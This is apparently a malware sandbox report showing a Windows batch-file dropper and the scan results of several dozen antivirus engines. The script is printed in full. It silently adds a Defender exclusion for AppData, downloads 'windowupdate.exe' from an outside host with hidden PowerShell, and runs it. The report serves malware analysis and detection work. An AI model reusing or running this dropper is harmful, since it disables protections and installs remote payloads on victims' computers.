Static | ZeroBOX
No static analysis available.
@echo off
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\%USERNAME%\AppData'"
setlocal enabledelayedexpansion
set "payloadpath=%appdata%\Custom-Application\files\payload.exe"
if not exist "%appdata%\Custom-Application\files" mkdir "%appdata%\Custom-Application\files"
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://tiendev.click/windowupdate.exe' -OutFile '%payloadpath%'"
powershell -WindowStyle Hidden -Command "Start-Process '%payloadpath%'"
exit /b
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Backdoor.xq
ALYac Gen:Trojan.Heur.LShot.1
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 BAT/TrojanDownloader.Agent.PBO
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.BAT.Agent.gen
BitDefender Gen:Trojan.Heur.LShot.1
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Trojan.Heur.LShot.1
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Gen:Trojan.Heur.LShot.1
TrendMicro Clean
CMC Clean
Emsisoft Gen:Trojan.Heur.LShot.1 (B)
huorong TrojanDownloader/PS.NetLoader.hv
FireEye Gen:Trojan.Heur.LShot.1
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Heur.LShot.1
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
GData Gen:Trojan.Heur.LShot.1
AVG Clean
Panda Clean
alibabacloud Suspicious
No IRMA results available.